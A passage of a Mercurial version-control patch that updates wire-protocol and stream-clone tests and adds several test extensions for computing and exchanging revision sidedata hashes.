xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-bad-tls requires unsupported TLS versions: 39, 42) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) diff --git a/tests/test-wireproto-exchangev2-shallow.t b/tests/test-wireproto-exchangev2-shallow.t --- a/tests/test-wireproto-exchangev2-shallow.t +++ b/tests/test-wireproto-exchangev2-shallow.t @@ -176,6 +176,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF @@ -347,6 +351,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-narrow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF diff --git a/tests/test-wireproto-exchangev2.t b/tests/test-wireproto-exchangev2.t --- a/tests/test-wireproto-exchangev2.t +++ b/tests/test-wireproto-exchangev2.t @@ -1099,7 +1099,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) @@ -1196,7 +1197,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) diff --git a/tests/testlib/common.sh b/tests/testlib/common.sh new file mode 100644 --- /dev/null +++ b/tests/testlib/common.sh @@ -0,0 +1,7 @@ +mkcommit() { + name="$1" + shift + echo "$name" > "$name" + hg add "$name" + hg ci -m "$name" "$@" +} diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-2.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-2.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-2.py @@ -1,6 +1,9 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-2.py - small extension to test (differently) the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,78 +13,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - -from mercurial.revlogutils import sidedata +from mercurial.revlogutils import sidedata as sidedatamod -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text - if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-3.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-3.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-3.py @@ -1,6 +1,10 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-3.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,19 +14,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) from mercurial import ( extensions, - requirements, revlog, ) -from mercurial.upgrade_utils import engine as upgrade_engine +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + -from mercurial.revlogutils import sidedata +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def compute_sidedata_3(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha384 = hashlib.sha384(text).digest() + sidedata[sidedatamod.SD_TEST3] = struct.pack('>48s', sha384) + return sidedata def wrapaddrevision( @@ -31,57 +54,35 @@ if kwargs.get('sidedata') is None: kwargs['sidedata'] = {} sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) + sd = compute_sidedata_1(None, self, None, sd, text=text) + kwargs['sidedata'] = compute_sidedata_2(None, self, None, sd, text=text) return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text - if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST3, + (sidedatamod.SD_TEST3,), + compute_sidedata_3, + ) + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-4.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-4.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-4.py @@ -1,87 +1,19 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-4.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a server for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import -import hashlib -import struct - -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - from mercurial.revlogutils import sidedata -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) - - -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text - if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + repo.register_wanted_sidedata(sidedata.SD_TEST2) + repo.register_wanted_sidedata(sidedata.SD_TEST3) diff --git a/tests/testlib/ext-sidedata-5.py b/tests/testlib/ext-sidedata-5.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-sidedata-5.py @@ -0,0 +1,81 @@ +# coding: utf8 +# ext-sidedata-5.py - small extension to test (differently still) the sidedata +# logic +# +# Simulates a server for a simple sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. + +from __future__ import absolute_import + +import hashlib +import struct + +from mercurial import ( + extensions, + revlog, +) + + +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + + +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) + + +def wrapaddrevision( + orig, self, text, transaction, link, p1, p2, *args, **kwargs +): + if kwargs.get('sidedata') is None: + kwargs['sidedata'] = {} + sd = kwargs['sidedata'] + ## let's store some arbitrary data just for testing + # text length + sd[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + # and sha2 hashes + sha256 = hashlib.sha256(text).digest() + sd[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return orig(self, text, transaction, link, p1, p2, *args, **kwargs) + + +def extsetup(ui): + extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata.py @@ -1,6 +1,6 @@ # ext-sidedata.py - small extension to test the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -40,19 +40,21 @@ return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) +def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): + text, sd = orig(self, nodeorrev, *args, **kwargs) if getattr(self, 'sidedatanocheck', False): - return text + return text, sd + if self.version & 0xFFFF != 2: + return text, sd if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: + cat1 = sd.get(sidedata.SD_TEST1) + if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]: raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] + expected = sd.get(sidedata.SD_TEST2) got = hashlib.sha256(text).digest() - if got != expected: + if expected is not None and got != expected: raise RuntimeError('sha256 mismatch') - return text + return text, sd def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): @@ -81,7 +83,14 @@ def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) + extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) extensions.wrapfunction( upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion ) + + +def reposetup(ui, repo): + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedata.SD_TEST1) + repo.register_wanted_sidedata(sidedata.SD_TEST2) diff --git a/tests/testlib/ext-stream-clone-steps.py b/tests/testlib/ext-stream-clone-steps.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-stream-clone-steps.py @@ -0,0 +1,31 @@ +from __future__ import absolute_import + +from mercurial import ( + encoding, + extensions, + streamclone, + testing, +) + + +WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] +WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + + +def _test_sync_point_walk_1(orig, repo): + testing.write_file(WALKED_FILE_1) + + +def _test_sync_point_walk_2(orig, repo): + assert repo._currentlock(repo._lockref) is None + testing.wait_file(WALKED_FILE_2) + + +def uisetup(ui): + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_1', _test_sync_point_walk_1 + ) + + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_2', _test_sync_point_walk_2 + )